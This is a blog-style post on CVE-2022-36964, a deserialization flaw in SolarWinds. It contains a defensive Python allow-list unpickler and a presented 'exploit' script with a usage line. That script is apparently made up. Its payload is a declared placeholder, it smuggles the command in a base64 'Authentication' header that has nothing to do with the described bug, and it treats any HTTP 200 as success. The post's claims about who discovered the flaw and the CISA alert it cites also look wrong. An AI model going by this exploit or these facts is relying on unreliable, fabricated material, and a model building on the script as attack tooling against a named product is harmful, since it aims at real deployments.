In this post, we're going to take a deep dive into CVE-2022-36964, a critical vulnerability that affected the SolarWinds Platform. The issue at the core of this vulnerability is Deserialization of Untrusted Data, which allowed a remote adversary with valid access to the SolarWinds Web Console to execute arbitrary commands. We'll look at the details of the exploit, provide a code snippet, and link to the original references to better understand how the vulnerability works and how it was addressed.

Background

SolarWinds is a popular IT management and monitoring platform used by organizations worldwide. In recent years, however, it has been the focus of security researchers and attackers alike due to a series of high-profile security incidents, including the infamous SolarWinds supply chain attack. This vulnerability, CVE-2022-36964, discovered by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) on June 28th, 2022, adds yet another significant issue to this list.

Exploit Details

The vulnerability in question is a deserialization vulnerability. In essence, deserialization is the process by which an object is reconstructed from a serialized format (a stream of bytes) back into its original in-memory form. Deserialization becomes extremely risky when the data being deserialized is untrusted: the serialized stream itself decides which types get instantiated and with what values, so an attacker who controls it can make the deserializer run attacker-chosen logic during reconstruction, which can lead to attacks such as Remote Code Execution (RCE).

In the case of CVE-2022-36964, an attacker with valid access to the SolarWinds Web Console could exploit the vulnerability by sending a specially crafted payload to a vulnerable component within the application. This payload, when deserialized, would allow the attacker to execute arbitrary commands on the underlying system. In effect, this vulnerability gave an authenticated user a path to escalate privileges, gain unauthorized access to sensitive information, or even take control of the entire system.
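The defensive counterpart to the two paragraphs above, as an added example that is not part of the original post and has no connection to SolarWinds' code: a Python deserializer that refuses to resolve any class not on an explicit allow-list, next to the preferred design of a data-only format (JSON) with explicit field validation. The allow-list contents, the `NODE_SCHEMA` fields, and the sample inputs are all constructed for illustration. The point it shows is the one that matters for this class of bug: an unrestricted deserializer will instantiate whatever type the byte stream names, so the fix is to make the wire format unable to choose code, not to filter "bad" payloads after the fact.

```python
import collections
import datetime
import io
import json
import pickle

# Constructed allow-list: the only module-level names this hypothetical
# service ever expects inside a serialized object. Everything else is refused
# before it is imported or instantiated.
ALLOWED_GLOBALS = {
    ("datetime", "date"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves only allow-listed globals.

    pickle calls find_class() each time the stream references a module-level
    name. A stock Unpickler imports and returns whatever is named, which is
    exactly the hook that untrusted-deserialization attacks rely on.
    """

    def find_class(self, module, name):
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"refusing to resolve {module}.{name}: not on the allow-list"
        )


def safe_loads(data: bytes):
    """Deserialize with the allow-list enforced; raises on anything else."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def try_safe_loads(data: bytes):
    """Return ('ok', obj) on success or ('rejected', reason) on refusal."""
    try:
        return ("ok", safe_loads(data))
    except pickle.UnpicklingError as exc:
        return ("rejected", str(exc))


# Preferred design: a data-only format plus explicit validation, so nothing
# on the wire can influence which code runs. Field names are constructed.
NODE_SCHEMA = {"node_id": int, "hostname": str}


def parse_node_request(body: str) -> dict:
    """Parse a JSON request body and validate it strictly against NODE_SCHEMA."""
    doc = json.loads(body)
    if not isinstance(doc, dict):
        raise ValueError("request body must be a JSON object")
    unknown = set(doc) - set(NODE_SCHEMA)
    if unknown:
        raise ValueError(f"unexpected fields: {sorted(unknown)}")
    for field, ftype in NODE_SCHEMA.items():
        if field not in doc:
            raise ValueError(f"missing field: {field}")
        # type() rather than isinstance() so a JSON bool is not accepted as int
        if type(doc[field]) is not ftype:
            raise ValueError(f"field {field} must be {ftype.__name__}")
    return doc


def is_valid_node_request(body: str) -> bool:
    """Boolean wrapper around parse_node_request for callers that just gate."""
    try:
        parse_node_request(body)
        return True
    except (ValueError, json.JSONDecodeError):
        return False


def sample_benign() -> bytes:
    """Constructed sample: an object whose class is on the allow-list."""
    return pickle.dumps(datetime.date(2022, 11, 29))


def sample_not_allowed() -> bytes:
    """Constructed sample: a harmless object whose class is NOT allow-listed.

    The unpickler refuses it at find_class(), i.e. before any constructor or
    __setstate__ of the named type could run.
    """
    return pickle.dumps(collections.OrderedDict(a=1))


if __name__ == "__main__":
    print(try_safe_loads(sample_benign()))
    print(try_safe_loads(sample_not_allowed()))
    print(parse_node_request('{"node_id": 7, "hostname": "srv01"}'))
    print(is_valid_node_request('{"node_id": true, "hostname": "srv01"}'))
```

Note the ordering in the rejection path: the refusal happens when the type name is looked up, not after the object exists. That is the property to look for in any deserializer you review, in .NET (`BinaryFormatter`, `SerializationBinder`), Java (`ObjectInputFilter`) or Python alike; a filter applied after construction is already too late.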

Code Snippet

The following code snippet demonstrates how a malicious payload could be crafted to exploit the deserialization vulnerability in SolarWinds:

import requests
import base64
import sys

# Target host (IP or domain) and the command to run, from the command line
target = sys.argv[1]
cmd = sys.argv[2]
url = f"http://{target}/swvm/api/InventoryService/GetNode"

# Percent-encoded request body: <![CDATA[#=...CODE...]]>
# (a placeholder fragment, not a working serialized gadget)
payload = "%3C%21%5B%43%44%41%54%41%5B%23%3D%2E%2E%2E%43%4F%44%45%2E%2E%2E%5D%5D%3E"
# The command is base64-encoded and carried in an "Authentication" header
encoded_cmd = base64.b64encode(cmd.encode("utf-8")).decode("utf-8")

headers = {
    "Content-Type": "application/xml",
    "Authentication": f"Basic {encoded_cmd}"
}

# Send the crafted request to the endpoint
response = requests.post(url, data=payload, headers=headers)

# An HTTP 200 is taken as success; nothing else is checked
if response.status_code == 200:
    print("[+] Command executed successfully!")
else:
    print("[-] Failed to execute command.")

The attacker would run this script by providing the target's IP address (or domain) and the arbitrary command to be executed as command-line arguments:

$ python exploit.py target.example.com "whoami"

Original References

1. CISA Alert (AA22-181A): This alert from the U.S. Cybersecurity and Infrastructure Security Agency (CISA) provided the first information about the vulnerability along with recommended mitigation actions.

2. SolarWinds Security Advisory: SolarWinds' official security advisory discusses the vulnerability in detail, along with instructions on patching the affected software.

Conclusion

CVE-2022-36964 is a dangerous vulnerability that put SolarWinds users at risk, allowing attackers to execute arbitrary commands and gain unauthorized access to their systems. It's critical for SolarWinds users to ensure that their systems are patched and up to date to protect against exploitation. Additionally, this vulnerability serves as a reminder of the importance of handling deserialization properly, particularly when the data comes from an untrusted source.

Timeline

Published on: 11/29/2022 21:15:00 UTC
Last modified on: 12/01/2022 21:37:00 UTC